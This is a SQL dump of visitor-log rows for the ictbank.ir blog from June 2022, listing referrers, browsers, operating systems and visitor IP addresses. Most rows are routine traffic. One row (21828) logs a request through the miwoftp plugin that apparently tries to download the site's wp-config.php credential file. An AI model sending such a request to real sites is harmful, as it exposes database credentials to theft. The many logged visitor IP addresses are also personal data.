(21731,'2022-06-12','http://ictbank.ir/blog','Android Browser','Android','2.2',NULL,NULL,'','108.62.52.221','000',0,1,0),
(21732,'2022-06-12','http://ictbank.ir/blog','Android Browser','Android','2.2',NULL,NULL,'','23.81.176.250','000',0,1,0),
(21733,'2022-06-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','198.251.77.83','000',0,1,0),
(21734,'2022-06-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','193.226.177.45','000',0,2,0),
(21735,'2022-06-12','http://www.design-arena.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','144.91.106.14','000',0,2,0),
(21736,'2022-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.214.230.138','000',0,1,0),
(21737,'2022-06-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(21738,'2022-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.70.17.103','000',0,1,0),
(21739,'2022-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.73.162.227','000',0,1,0),
(21740,'2022-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','90.187.238.157','000',0,2,0),
(21741,'2022-06-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.190.161','000',0,1,0),
(21742,'2022-06-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(21743,'2022-06-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(21744,'2022-06-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(21745,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','14.182.232.152','000',0,1,0),
(21746,'2022-06-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,1,0),
(21747,'2022-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.188.62.26','000',0,3,0),
(21748,'2022-06-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(21749,'2022-06-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','204.101.161.19','000',0,1,0),
(21750,'2022-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.185','000',0,1,0),
(21751,'2022-06-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','83.175.118.162','000',0,1,0),
(21752,'2022-06-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.82.214.189','000',0,1,0),
(21753,'2022-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','154.50.136.31','000',0,2,0),
(21754,'2022-06-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,4,0),
(21755,'2022-06-13','http://wikisonnati.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','199.195.250.13','000',0,1,0),
(21756,'2022-06-13','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,5,0),
(21757,'2022-06-13','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','95.211.95.248','000',0,1,0),
(21758,'2022-06-13','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','91.212.136.52','000',0,1,0),
(21759,'2022-06-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(21760,'2022-06-13','https://webtechsurvey.com/website/ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','23.229.104.2','000',0,3,0),
(21761,'2022-06-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.115.111','000',0,2,0),
(21762,'2022-06-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.30.83.174','000',0,2,0),
(21763,'2022-06-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.126.74.161','000',0,2,0),
(21764,'2022-06-13','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','104.222.43.121','000',0,2,0),
(21765,'2022-06-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.47','000',0,1,0),
(21766,'2022-06-13','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','104.222.43.110','000',0,2,0),
(21767,'2022-06-13','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','104.222.43.190','000',0,2,0),
(21768,'2022-06-13','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','104.222.43.139','000',0,2,0),
(21769,'2022-06-13','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','104.222.43.23','000',0,2,0),
(21770,'2022-06-13','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','104.222.43.10','000',0,2,0),
(21771,'2022-06-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.26','000',0,1,0),
(21772,'2022-06-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.42','000',0,7,0),
(21773,'2022-06-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','198.251.77.83','000',0,2,0),
(21774,'2022-06-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.31','000',0,2,0),
(21775,'2022-06-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.21','000',0,1,0),
(21776,'2022-06-13','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','20.115.46.213','000',0,2,0),
(21777,'2022-06-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.28','000',0,1,0),
(21778,'2022-06-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.51','000',0,1,0),
(21779,'2022-06-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','146.59.152.33','000',0,2,0),
(21780,'2022-06-13','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,2,0),
(21781,'2022-06-13','http://www.ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','137.74.24.99','000',0,2,0),
(21782,'2022-06-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(21783,'2022-06-13','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.82','000',0,1,0),
(21784,'2022-06-13','http://wikisonnati.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.115','000',0,1,0),
(21785,'2022-06-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','90.187.238.157','000',0,1,0),
(21786,'2022-06-13','http://ictbank.ir/blog','Chrome','OS X','10.6.6',NULL,NULL,'','208.80.194.126','000',0,2,0),
(21787,'2022-06-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.44','000',0,2,0),
(21788,'2022-06-13','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.36.231','000',0,1,0),
(21789,'2022-06-13','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','101.227.1.197','000',0,2,0),
(21790,'2022-06-13','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.26.182.26','000',0,1,0),
(21791,'2022-06-13','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.29','000',0,1,0),
(21792,'2022-06-13','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.5','000',0,1,0),
(21793,'2022-06-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.234.217','000',0,1,0),
(21794,'2022-06-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','44.236.207.248','000',0,1,0),
(21795,'2022-06-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','44.227.127.2','000',0,1,0),
(21796,'2022-06-13','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.89','000',0,2,0),
(21797,'2022-06-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(21798,'2022-06-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.123.140','000',0,1,0),
(21799,'2022-06-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.222.35','000',0,1,0),
(21800,'2022-06-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(21801,'2022-06-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(21802,'2022-06-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.95','000',0,6,0),
(21803,'2022-06-13','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.42','000',0,1,0),
(21804,'2022-06-13','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','185.126.118.229','000',0,1,0),
(21805,'2022-06-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.73.162.238','000',0,1,0),
(21806,'2022-06-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.8','000',0,3,0),
(21807,'2022-06-13','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.82','000',0,4,0),
(21808,'2022-06-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.248.171.23','000',0,1,0),
(21809,'2022-06-13','http://82.102.9.14:80/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','67.255.23.250','000',0,1,0),
(21810,'2022-06-14','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,2,0),
(21811,'2022-06-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(21812,'2022-06-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.95','000',0,1,0),
(21813,'2022-06-14','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.81','000',0,2,0),
(21814,'2022-06-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,3,0),
(21815,'2022-06-14','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','34.205.87.78','000',0,1,0),
(21816,'2022-06-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','199.249.230.87','000',0,1,0),
(21817,'2022-06-14','http://ictbank.ir/blog/index.php/tag/rebuild/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.4','000',0,7,0),
(21818,'2022-06-14','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/#comment-82','Chrome','Windows','10.0',NULL,NULL,'','178.159.37.11','000',0,8,0),
(21819,'2022-06-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','104.222.43.130','000',0,1,0),
(21820,'2022-06-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,12,0),
(21821,'2022-06-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.82.77.33','000',0,2,0),
(21822,'2022-06-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.237.86.67','000',0,1,0),
(21823,'2022-06-14','http://ictbank.ir/blog/comments/feed/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.64','000',0,1,0),
(21824,'2022-06-14','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.126','000',0,6,0),
(21825,'2022-06-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(21826,'2022-06-14','http://ictbank.ir/blog/index.php/tag/characterset/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.8','000',0,7,0),
(21827,'2022-06-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.227.119.96','000',0,2,0),
(21828,'2022-06-14','http://ictbank.ir/blog/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes','Unknown','Windows','10.0',NULL,NULL,'','181.214.173.67','000',0,4,0),
(21829,'2022-06-14','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.54','000',0,1,0),
(21830,'2022-06-14','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.36.112','000',0,1,0),
(21831,'2022-06-14','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','111.7.100.17','000',0,1,0),
(21832,'2022-06-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','146.59.152.33','000',0,1,0),
(21833,'2022-06-14','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','124.223.193.80','000',0,2,0),
(21834,'2022-06-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.216.171','000',0,1,0),
(21835,'2022-06-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.106','000',0,2,0),
(21836,'2022-06-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.125.219','000',0,1,0),
(21837,'2022-06-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','108.61.208.75','000',0,1,0),
(21838,'2022-06-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,2,0),
(21839,'2022-06-14','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.170','000',0,1,0),
(21840,'2022-06-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(21841,'2022-06-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','88.64.173.94','000',0,4,0),
(21842,'2022-06-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(21843,'2022-06-15','http://ictbank.ir/blog/impdp-errors-ora-02374-ora-12899/','Chrome','Windows','10.0',NULL,NULL,'','88.64.173.94','000',0,4,0),
(21844,'2022-06-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,6,0),
(21845,'2022-06-15','https://www.bing.com','Chrome','OpenBSD','',NULL,NULL,'','128.199.242.104','000',0,20,0),
(21846,'2022-06-15','http://ictbank.ir/blog','Chromium','Ubuntu','Unknown',NULL,NULL,'','121.46.142.244','000',0,1,0),
(21847,'2022-06-15','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.122','000',0,2,0),
(21848,'2022-06-15','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','208.80.194.126','000',0,6,0),
(21849,'2022-06-15','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','182.54.16.175','000',0,1,0),
(21850,'2022-06-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','181.215.176.44','000',0,6,0),
(21851,'2022-06-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','38.130.107.22','000',0,4,0),
(21852,'2022-06-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.95','000',0,1,0),
(21853,'2022-06-15','http://82.102.9.14/blog/','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.252','000',0,1,0),
(21854,'2022-06-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(21855,'2022-06-15','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','176.74.192.85','000',0,1,0),
(21856,'2022-06-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.89.19.182','000',0,1,0),
(21857,'2022-06-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.34.76.65','000',0,1,0),
(21858,'2022-06-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.215.70','000',0,2,0),
(21859,'2022-06-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.40','000',0,2,0),
(21860,'2022-06-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(21861,'2022-06-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.46.55','000',0,1,0),
(21862,'2022-06-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(21863,'2022-06-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(21864,'2022-06-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.158.36.183','000',0,1,0),
(21865,'2022-06-15','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','2.95.89.194','000',0,2,0),
(21866,'2022-06-16','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','208.80.194.121','000',0,7,0),
(21867,'2022-06-16','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.42','000',0,2,0),
(21868,'2022-06-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,9,0),
(21869,'2022-06-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(21870,'2022-06-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','185.159.156.5','000',0,2,0),
(21871,'2022-06-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.60.189','000',0,1,0),
(21872,'2022-06-16','http://ictbank.ir/blog','Chrome','Android','8.1',NULL,NULL,'','129.227.143.70','000',0,2,0),
(21873,'2022-06-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','137.184.231.144','000',0,2,0),
(21874,'2022-06-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(21875,'2022-06-16','http://ictbank.ir/blog','Chrome','OS X','10.13.5',NULL,NULL,'','194.36.97.59','000',0,13,0),
(21876,'2022-06-16','http://www.ictbank.ir/blog','Chrome','OS X','10.13.5',NULL,NULL,'','198.202.171.98','000',0,2,0),
(21877,'2022-06-16','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','38.130.107.22','000',0,2,0),
(21878,'2022-06-16','http://wikisonnati.com/blog','Firefox','Windows','10.0',NULL,NULL,'','37.120.153.227','000',0,4,0),
(21879,'2022-06-16','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.126','000',0,1,0),
(21880,'2022-06-16','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/#comment-82','Chrome','Windows','10.0',NULL,NULL,'','178.159.37.11','000',0,8,0),
(21881,'2022-06-16','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','84.17.58.116','000',0,1,0),
(21882,'2022-06-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','35.165.215.140','000',0,1,0),
(21883,'2022-06-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.88.253.138','000',0,3,0),
(21884,'2022-06-16','http://ictbank.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','136.169.243.111','000',0,6,0),
(21885,'2022-06-16','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','156.146.59.16','000',0,2,0),
(21886,'2022-06-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(21887,'2022-06-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','143.110.219.244','000',0,2,0),
(21888,'2022-06-16','http://ictbank.ir/blog/comments/feed/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.64','000',0,1,0),
(21889,'2022-06-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.41.15.18','000',0,1,0),
(21890,'2022-06-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.188.62.76','000',0,1,0),
(21891,'2022-06-16','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,3,0),
(21892,'2022-06-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.0.67','000',0,1,0),
(21893,'2022-06-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.9.96','000',0,1,0),
(21894,'2022-06-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(21895,'2022-06-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(21896,'2022-06-16','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','60.13.138.136','000',0,1,0),
(21897,'2022-06-16','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','3.140.199.250','000',0,4,0),
(21898,'2022-06-16','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','46.166.162.94','000',0,1,0),
(21899,'2022-06-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.168.35.233','000',0,2,0),
(21900,'2022-06-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(21901,'2022-06-17','http://ictbank.ir/blog','Firefox Mobile','Android','Unknown',NULL,NULL,'','175.178.57.232','000',0,30,0),
(21902,'2022-06-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.217.32.190','000',0,8,0),
(21903,'2022-06-17','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','18.208.248.146','000',0,2,0),
(21904,'2022-06-17','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.126','000',0,7,0),
(21905,'2022-06-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,2,0),
(21906,'2022-06-17','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.198.236','000',0,2,0),
(21907,'2022-06-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','176.9.47.122','000',0,2,0),
(21908,'2022-06-17','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.169.97','000',0,2,0),
(21909,'2022-06-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','213.252.140.118','000',0,1,0),
(21910,'2022-06-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,5,0),
(21911,'2022-06-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.155.10','000',0,4,0),
(21912,'2022-06-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.198.233','000',0,1,0),
(21913,'2022-06-17','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','192.15.93.113','000',0,1,0),
(21914,'2022-06-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.5','000',0,2,0),
(21915,'2022-06-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.221.200','000',0,1,0),
(21916,'2022-06-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.220.182','000',0,1,0),
(21917,'2022-06-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(21918,'2022-06-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(21919,'2022-06-17','http://ictbank.ir/blog','Chrome','OS X','10.11.5',NULL,NULL,'','45.129.18.135','000',0,1,0),
(21920,'2022-06-18','http://ictbank.ir/blog','Safari','OS X','10.7.2',NULL,NULL,'','208.80.194.121','000',0,5,0),
(21921,'2022-06-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(21922,'2022-06-18','http://ictbank.ir/blog','Chrome','OS X','10.13.5',NULL,NULL,'','50.3.159.51','000',0,13,0),
(21923,'2022-06-18','http://www.ictbank.ir/blog','Chrome','OS X','10.13.5',NULL,NULL,'','181.177.111.13','000',0,2,0),
(21924,'2022-06-18','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,4,0),
(21925,'2022-06-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,5,0),
(21926,'2022-06-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','109.87.150.16','000',0,1,0),
(21927,'2022-06-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','181.214.206.161','000',0,2,0),
(21928,'2022-06-18','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','156.251.172.208','000',0,3,0),
(21929,'2022-06-18','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','45.138.74.112','000',0,1,0),
(21930,'2022-06-18','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','212.102.33.35','000',0,2,0),
(21931,'2022-06-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','88.99.136.18','000',0,2,0),
(21932,'2022-06-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','158.69.210.82','000',0,1,0),
(21933,'2022-06-18','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.65.125','000',0,1,0),
(21934,'2022-06-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,1,0),
(21935,'2022-06-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','108.61.208.75','000',0,1,0),
(21936,'2022-06-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,1,0),
(21937,'2022-06-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(21938,'2022-06-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(21939,'2022-06-18','http://ictbank.ir/blog/comments/feed/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.64','000',0,1,0),
(21940,'2022-06-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.59','000',0,1,0),
(21941,'2022-06-18','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.126','000',0,1,0),
(21942,'2022-06-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.83.93','000',0,2,0),
(21943,'2022-06-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.35','000',0,3,0),
(21944,'2022-06-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.50','000',0,1,0),
(21945,'2022-06-19','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,3,0),
(21946,'2022-06-19','http://ictbank.ir/blog','Unknown','OS X','10.9.2',NULL,NULL,'','94.247.172.129','000',0,2,0),
(21947,'2022-06-19','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','193.128.111.37','000',0,1,0),
(21948,'2022-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.60.189','000',0,2,0),
(21949,'2022-06-19','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,5,0),
(21950,'2022-06-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.158.166','000',0,2,0),
(21951,'2022-06-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,3,0),
(21952,'2022-06-19','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','1.85.216.137','000',0,1,0),
(21953,'2022-06-19','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','208.80.194.126','000',0,2,0),
(21954,'2022-06-19','http://ictbank.ir/blog','Safari','iOS','15.1',NULL,NULL,'','5.8.26.204','000',0,3,0),
